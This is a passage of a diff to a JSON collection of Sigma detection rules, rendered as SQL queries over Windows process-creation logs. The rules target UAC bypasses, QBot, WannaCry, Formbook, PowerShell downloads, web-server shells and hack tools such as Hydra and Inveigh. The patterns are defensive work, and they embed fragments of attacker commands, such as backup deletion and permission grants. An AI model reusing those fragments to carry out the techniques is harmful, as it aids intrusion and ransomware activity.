NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine REGEXP '\\s-\\s*<')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR OriginalFileName = 'CMSTP.EXE') AND (CommandLine LIKE '%/s%' ESCAPE '\\' OR CommandLine LIKE '%-s%' ESCAPE '\\' OR CommandLine LIKE '%/au%' ESCAPE '\\' OR CommandLine LIKE '%-au%' ESCAPE '\\' OR CommandLine LIKE '%/ni%' ESCAPE '\\' OR CommandLine LIKE '%-ni%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_run_script_from_input_stream.yml" + "filename": "proc_creation_win_uac_bypass_cmstp.yml" }, { - "title": "UAC Bypass Using Disk Cleanup", - "id": "b697e69c-746f-4a86-9f59-7bfff8eab881", + "title": "Potential QBot Activity", + "id": "4fcac6eb-0287-4090-8eea-2602e4c20040", + "status": "stable", + "description": "Detects potential QBot activity by looking for process executions used previously by QBot", + "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.execution", + "attack.t1059.005" + ], + "falsepositives": [ + "Unlikely" + ], + "level": "critical", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\WinRAR.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') OR CommandLine LIKE '% /c ping.exe -n 6 127.0.0.1 & type %' ESCAPE '\\' OR (CommandLine LIKE '%regsvr32.exe%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData%' ESCAPE '\\' AND CommandLine LIKE '%.tmp%' ESCAPE '\\')))" + ], + "filename": "proc_creation_win_malware_qbot.yml" + }, + { + "title": "Terminal Service Process Spawn", + "id": "1012f107-b8f1-4271-af30-5aed2de89b39", "status": "test", - "description": "Detects the pattern of UAC Bypass using scheduled tasks and variable expansion of cleanmgr.exe (UACMe 34)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects a process spawned by the terminal service server process (this could be an indicator for an exploitation of CVE-2019-0708)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.initial_access", + "attack.t1190", + "attack.lateral_movement", + "attack.t1210", + "car.2013-07-002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\"\\\\system32\\\\cleanmgr.exe /autoclean /d C:' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s Schedule' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentCommandLine LIKE '%\\\\svchost.exe%' ESCAPE '\\' AND ParentCommandLine LIKE '%termsvcs%' ESCAPE '\\') AND NOT (((NewProcessName LIKE '%\\\\rdpclip.exe' ESCAPE '\\' OR NewProcessName LIKE '%:\\\\Windows\\\\System32\\\\csrss.exe' ESCAPE '\\' OR NewProcessName LIKE '%:\\\\Windows\\\\System32\\\\wininit.exe' ESCAPE '\\' OR NewProcessName LIKE '%:\\\\Windows\\\\System32\\\\winlogon.exe' ESCAPE '\\')) OR (NewProcessName = '')))" ], - "filename": "proc_creation_win_uac_bypass_cleanmgr.yml" + "filename": "proc_creation_win_svchost_termserv_proc_spawn.yml" }, { - "title": "Potential Defense Evasion Via Right-to-Left Override", - "id": "ad691d92-15f2-4181-9aa4-723c74f9ddc3", + "title": "Use NTFS Short Name in Image", + "id": "3ef5605c-9eb9-47b0-9a71-b727e6aa5c3b", "status": "experimental", - "description": "Detects the presence of the \"u202+E\" character, which causes a terminal, browser, or operating system to render text in a right-to-left sequence.\nThis is used as an obfuscation and masquerading techniques.\n", - "author": "Micah Babinski, @micahbabinski", + "description": "Detect use of the Windows 8.3 short name. Which could be used as a method to avoid Image based detection", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1036.002" + "attack.t1564.004" ], "falsepositives": [ - "Commandlines that contains scriptures such as arabic or hebrew might make use of this character" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%‮%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%~1.exe%' ESCAPE '\\' OR NewProcessName LIKE '%~1.bat%' ESCAPE '\\' OR NewProcessName LIKE '%~1.msi%' ESCAPE '\\' OR NewProcessName LIKE '%~1.vbe%' ESCAPE '\\' OR NewProcessName LIKE '%~1.vbs%' ESCAPE '\\' OR NewProcessName LIKE '%~1.dll%' ESCAPE '\\' OR NewProcessName LIKE '%~1.ps1%' ESCAPE '\\' OR NewProcessName LIKE '%~1.js%' ESCAPE '\\' OR NewProcessName LIKE '%~1.hta%' ESCAPE '\\' OR NewProcessName LIKE '%~2.exe%' ESCAPE '\\' OR NewProcessName LIKE '%~2.bat%' ESCAPE '\\' OR NewProcessName LIKE '%~2.msi%' ESCAPE '\\' OR NewProcessName LIKE '%~2.vbe%' ESCAPE '\\' OR NewProcessName LIKE '%~2.vbs%' ESCAPE '\\' OR NewProcessName LIKE '%~2.dll%' ESCAPE '\\' OR NewProcessName LIKE '%~2.ps1%' ESCAPE '\\' OR NewProcessName LIKE '%~2.js%' ESCAPE '\\' OR NewProcessName LIKE '%~2.hta%' ESCAPE '\\') AND NOT ((ParentProcessName LIKE '%\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\thor\\\\thor64.exe' ESCAPE '\\' OR ParentProcessName LIKE '%-installer.exe' ESCAPE '\\') OR NewProcessName LIKE '%\\\\vcredi%' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_right_to_left_override.yml" + "filename": "proc_creation_win_susp_ntfs_short_name_use_image.yml" }, { - "title": "UAC Bypass Using IEInstal - Process", - "id": "80fc36aa-945e-4181-89f2-2f907ab6775d", + "title": "Suspicious UltraVNC Execution", + "id": "871b9555-69ca-4993-99d3-35a59f9f3599", "status": "test", - "description": "Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects suspicious UltraVNC command line flag combination that indicate a auto reconnect upon execution, e.g. startup (as seen being used by Gamaredon threat group)", + "author": "Bhabesh Raj", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.lateral_movement", + "attack.g0047", + "attack.t1021.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND IntegrityLevel IN ('High', 'System') AND ParentProcessName LIKE '%\\\\ieinstal.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%consent.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%-autoreconnect %' ESCAPE '\\' AND CommandLine LIKE '%-connect %' ESCAPE '\\' AND CommandLine LIKE '%-id:%' ESCAPE '\\')" ], - "filename": "proc_creation_win_uac_bypass_ieinstal.yml" + "filename": "proc_creation_win_ultravnc_susp_execution.yml" }, { - "title": "PowerShell DownloadFile", - "id": "8f70ac5f-1f6f-4f8e-b454-db19561216c5", - "status": "test", - "description": "Detects the execution of powershell, a WebClient object creation and the invocation of DownloadFile in a single command line", + "title": "HackTool - Htran/NATBypass Execution", + "id": "f5e3b62f-e577-4e59-931e-0a15b2b94e1e", + "status": "experimental", + "description": "Detects exeuctable names or flags used by Htran or Htran-like tools (e.g. NATBypass)", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001", "attack.command_and_control", - "attack.t1104", - "attack.t1105" + "attack.t1090", + "attack.s0040" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%.DownloadFile%' ESCAPE '\\' AND CommandLine LIKE '%System.Net.WebClient%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\htran.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\lcx.exe' ESCAPE '\\') OR (CommandLine LIKE '%.exe -tran %' ESCAPE '\\' OR CommandLine LIKE '%.exe -slave %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_susp_ps_downloadfile.yml" + "filename": "proc_creation_win_hktl_htran_or_natbypass.yml" }, { - "title": "Formbook Process Creation", - "id": "032f5fb3-d959-41a5-9263-4173c802dc2b", + "title": "Using SettingSyncHost.exe as LOLBin", + "id": "b2ddd389-f676-4ac4-845a-e00781a48e5f", "status": "test", - "description": "Detects Formbook like process executions that inject code into a set of files in the System32 folder, which executes a special command command line to delete the dropper from the AppData Temp folder. We avoid false positives by excluding all parent process with command line parameters.", - "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", + "description": "Detects using SettingSyncHost.exe to run hijacked binary", + "author": "Anton Kutepov, oscd.community", "tags": [ - "attack.resource_development", - "attack.t1587.001" + "attack.execution", + "attack.defense_evasion", + "attack.t1574.008" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentCommandLine LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ParentCommandLine LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\') AND ParentCommandLine LIKE '%.exe' ESCAPE '\\') AND ((CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%del%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%del%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%/C%' ESCAPE '\\' AND CommandLine LIKE '%type nul >%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\')) AND CommandLine LIKE '%.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')) AND (ParentCommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' AND ParentCommandLine LIKE '%RoamDiag.cmd%' ESCAPE '\\' AND ParentCommandLine LIKE '%-outputpath%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_formbook.yml" + "filename": "proc_creation_win_lolbin_settingsynchost.yml" }, { - "title": "HackTool - Inveigh Execution", - "id": "b99a1518-1ad5-4f65-bc95-1ffff97a8fd0", - "status": "experimental", - "description": "Detects the use of Inveigh a cross-platform .NET IPv4/IPv6 machine-in-the-middle tool", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "HackTool - Hydra Password Bruteforce Execution", + "id": "aaafa146-074c-11eb-adc1-0242ac120002", + "status": "test", + "description": "Detects command line parameters used by Hydra password guessing hack tool", + "author": "Vasiliy Burov", "tags": [ "attack.credential_access", - "attack.t1003.001" + "attack.t1110", + "attack.t1110.001" ], "falsepositives": [ - "Very unlikely" + "Software that uses the caret encased keywords PASS and USER in its command line" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\Inveigh.exe' ESCAPE '\\' OR (OriginalFileName LIKE '\\\\Inveigh.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\Inveigh.dll' ESCAPE '\\') OR Description = 'Inveigh' OR (CommandLine LIKE '% -SpooferIP%' ESCAPE '\\' OR CommandLine LIKE '% -ReplyToIPs %' ESCAPE '\\' OR CommandLine LIKE '% -ReplyToDomains %' ESCAPE '\\' OR CommandLine LIKE '% -ReplyToMACs %' ESCAPE '\\' OR CommandLine LIKE '% -SnifferIP%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%-u %' ESCAPE '\\' AND CommandLine LIKE '%-p %' ESCAPE '\\' AND (CommandLine LIKE '%^USER^%' ESCAPE '\\' OR CommandLine LIKE '%^PASS^%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_inveigh.yml" + "filename": "proc_creation_win_hktl_hydra.yml" }, { - "title": "Suspicious WebDav Client Execution", - "id": "982e9f2d-1a85-4d5b-aea4-31f5e97c6555", + "title": "Suspicious New Service Creation", + "id": "17a1be64-8d88-40bf-b5ff-a4f7a50ebcc8", "status": "experimental", - "description": "Detects \"svchost.exe\" spawning \"rundll32.exe\" with command arguments like C:\\windows\\system32\\davclnt.dll,DavSetCookie. This could be an indicator of exfiltration or use of WebDav to launch code (hosted on WebDav Server) or potentially a sign of exploitation of CVE-2023-23397\n", - "author": "Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)", + "description": "Detects creation of a new service via \"sc\" command or the powershell \"new-service\" cmdlet with suspicious binary paths", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.exfiltration", - "attack.t1048.003", - "cve.2023.23397" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\windows\\\\system32\\\\davclnt.dll,DavSetCookie%' ESCAPE '\\' AND CommandLine REGEXP '://\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}') AND NOT (((CommandLine LIKE '%://10.%' ESCAPE '\\' OR CommandLine LIKE '%://192.168.%' ESCAPE '\\' OR CommandLine LIKE '%://172.16.%' ESCAPE '\\' OR CommandLine LIKE '%://172.17.%' ESCAPE '\\' OR CommandLine LIKE '%://172.18.%' ESCAPE '\\' OR CommandLine LIKE '%://172.19.%' ESCAPE '\\' OR CommandLine LIKE '%://172.20.%' ESCAPE '\\' OR CommandLine LIKE '%://172.21.%' ESCAPE '\\' OR CommandLine LIKE '%://172.22.%' ESCAPE '\\' OR CommandLine LIKE '%://172.23.%' ESCAPE '\\' OR CommandLine LIKE '%://172.24.%' ESCAPE '\\' OR CommandLine LIKE '%://172.25.%' ESCAPE '\\' OR CommandLine LIKE '%://172.26.%' ESCAPE '\\' OR CommandLine LIKE '%://172.27.%' ESCAPE '\\' OR CommandLine LIKE '%://172.28.%' ESCAPE '\\' OR CommandLine LIKE '%://172.29.%' ESCAPE '\\' OR CommandLine LIKE '%://172.30.%' ESCAPE '\\' OR CommandLine LIKE '%://172.31.%' ESCAPE '\\' OR CommandLine LIKE '%://127.%' ESCAPE '\\' OR CommandLine LIKE '%://169.254.%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\' AND CommandLine LIKE '%binPath=%' ESCAPE '\\') OR (CommandLine LIKE '%New-Service%' ESCAPE '\\' AND CommandLine LIKE '%-BinaryPathName%' ESCAPE '\\')) AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%svchost%' ESCAPE '\\' OR CommandLine LIKE '%dllhost%' ESCAPE '\\' OR CommandLine LIKE '%cmd %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_rundll32_webdav_client_susp_execution.yml" + "filename": "proc_creation_win_susp_service_creation.yml" }, { - "title": "Suspicious Windows Update Agent Empty Cmdline", - "id": "52d097e2-063e-4c9c-8fbb-855c8948d135", - "status": "experimental", - "description": "Detects suspicious Windows Update Agent activity in which a wuauclt.exe process command line doesn't contain any command line flags", - "author": "Florian Roth (Nextron Systems)", + "title": "WannaCry Ransomware Activity", + "id": "41d40bff-377a-43e2-8e1b-2e543069e079", + "status": "test", + "description": "Detects WannaCry ransomware activity", + "author": "Florian Roth (Nextron Systems), Tom U. @c_APT_ure (collection), oscd.community, Jonhnathan Ribeiro", + "tags": [ + "attack.lateral_movement", + "attack.t1210", + "attack.discovery", + "attack.t1083", + "attack.defense_evasion", + "attack.t1222.001", + "attack.impact", + "attack.t1486", + "attack.t1490" + ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\Wuauclt.exe' ESCAPE '\\' OR OriginalFileName = 'Wuauclt.exe') AND CommandLine LIKE '%\\\\Wuauclt.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\tasksche.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mssecsvc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskdl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskhsvc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskse.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\111.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\lhdfrgui.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\linuxnew.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wannacry.exe' ESCAPE '\\') OR NewProcessName LIKE '%WanaDecryptor%' ESCAPE '\\' OR (CommandLine LIKE '%icacls%' ESCAPE '\\' AND CommandLine LIKE '%/grant%' ESCAPE '\\' AND CommandLine LIKE '%Everyone:F%' ESCAPE '\\' AND CommandLine LIKE '%/T%' ESCAPE '\\' AND CommandLine LIKE '%/C%' ESCAPE '\\' AND CommandLine LIKE '%/Q%' ESCAPE '\\') OR (CommandLine LIKE '%bcdedit%' ESCAPE '\\' AND CommandLine LIKE '%/set%' ESCAPE '\\' AND CommandLine LIKE '%{default}%' ESCAPE '\\' AND CommandLine LIKE '%recoveryenabled%' ESCAPE '\\' AND CommandLine LIKE '%no%' ESCAPE '\\') OR (CommandLine LIKE '%wbadmin%' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%catalog%' ESCAPE '\\' AND CommandLine LIKE '%-quiet%' ESCAPE '\\') OR CommandLine LIKE '%@Please\\_Read\\_Me@.txt%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wuauclt_no_cli_flags_execution.yml" + "filename": "proc_creation_win_malware_wannacry.yml" }, { - "title": "HackTool - PPID Spoofing SelectMyParent Tool Execution", - "id": "52ff7941-8211-46f9-84f8-9903efb7077d", - "status": "test", - "description": "Detects the use of parent process ID spoofing tools like Didier Stevens tool SelectMyParent", + "title": "Security Privileges Enumeration Via Whoami.EXE", + "id": "97a80ec7-0e2f-4d05-9ef4-65760e634f6b", + "status": "experimental", + "description": "Detects a whoami.exe executed with the /priv command line flag instructing the tool to show all current user privileges. This is often used after a privilege escalation attempt.", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1134.004" + "attack.privilege_escalation", + "attack.discovery", + "attack.t1033" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SelectMyParent.exe' ESCAPE '\\' OR (CommandLine LIKE '%PPID-spoof%' ESCAPE '\\' OR CommandLine LIKE '%ppid\\_spoof%' ESCAPE '\\' OR CommandLine LIKE '%spoof-ppid%' ESCAPE '\\' OR CommandLine LIKE '%spoof\\_ppid%' ESCAPE '\\' OR CommandLine LIKE '%ppidspoof%' ESCAPE '\\' OR CommandLine LIKE '%spoofppid%' ESCAPE '\\' OR CommandLine LIKE '%spoofedppid%' ESCAPE '\\' OR CommandLine LIKE '% -spawnto %' ESCAPE '\\') OR (OriginalFileName LIKE '%PPID-spoof%' ESCAPE '\\' OR OriginalFileName LIKE '%ppid\\_spoof%' ESCAPE '\\' OR OriginalFileName LIKE '%spoof-ppid%' ESCAPE '\\' OR OriginalFileName LIKE '%spoof\\_ppid%' ESCAPE '\\' OR OriginalFileName LIKE '%ppidspoof%' ESCAPE '\\' OR OriginalFileName LIKE '%spoofppid%' ESCAPE '\\' OR OriginalFileName LIKE '%spoofedppid%' ESCAPE '\\') OR Description = 'SelectMyParent' OR Imphash IN ('04d974875bd225f00902b4cad9af3fbc', 'a782af154c9e743ddf3f3eb2b8f3d16e', '89059503d7fbf470e68f7e63313da3ad', 'ca28337632625c8281ab8a130b3d6bad') OR (Hashes LIKE '%IMPHASH=04D974875BD225F00902B4CAD9AF3FBC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A782AF154C9E743DDF3F3EB2B8F3D16E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=89059503D7FBF470E68F7E63313DA3AD%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=CA28337632625C8281AB8A130B3D6BAD%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe') AND (CommandLine LIKE '% /priv%' ESCAPE '\\' OR CommandLine LIKE '% -priv%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_selectmyparent.yml" + "filename": "proc_creation_win_whoami_priv_discovery.yml" }, { - "title": "DNS RCE CVE-2020-1350", - "id": "b5281f31-f9cc-4d0d-95d0-45b91c45b487", + "title": "Shells Spawned by Web Servers", + "id": "8202070f-edeb-4d31-a010-a26c72ac5600", "status": "test", - "description": "Detects exploitation of DNS RCE bug reported in CVE-2020-1350 by the detection of suspicious sub process", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects web servers that spawn shell processes which could be the result of a successfully placed web shell or another attack", + "author": "Thomas Patzke, Florian Roth (Nextron Systems), Zach Stanford @svch0st, Tim Shelton, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.initial_access", - "attack.t1190", - "attack.execution", - "attack.t1569.002" + "attack.persistence", + "attack.t1505.003", + "attack.t1190" ], "falsepositives": [ - "Unknown but benign sub processes of the Windows DNS service dns.exe" + "Particular web applications may spawn a shell process legitimately" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\System32\\\\dns.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\System32\\\\werfault.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\System32\\\\conhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\System32\\\\dnscmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\System32\\\\dns.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\php.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ws\\_TomcatService.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\tomcat.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\UMWorkerProcess.exe' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentProcessName LIKE '%-tomcat-%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentCommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR ParentCommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\' OR ParentCommandLine LIKE '%catalina.home%' ESCAPE '\\'))) AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\arp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\at.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dsget.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dsquery.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\find.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\findstr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\fsutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hostname.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\nbtstat.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netdom.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netstat.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\nltest.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ntdutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pathping.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ping.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\qprocess.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\query.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\qwinsta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tasklist.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tracert.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ver.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wusa.exe' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%Windows\\\\system32\\\\cmd.exe /c C:\\\\ManageEngine\\\\ADManager \"Plus\\\\ES\\\\bin\\\\elasticsearch.bat -Enode.name=RMP-NODE1 -pelasticsearch-pid.txt' ESCAPE '\\') OR (CommandLine LIKE '%sc query%' ESCAPE '\\' AND CommandLine 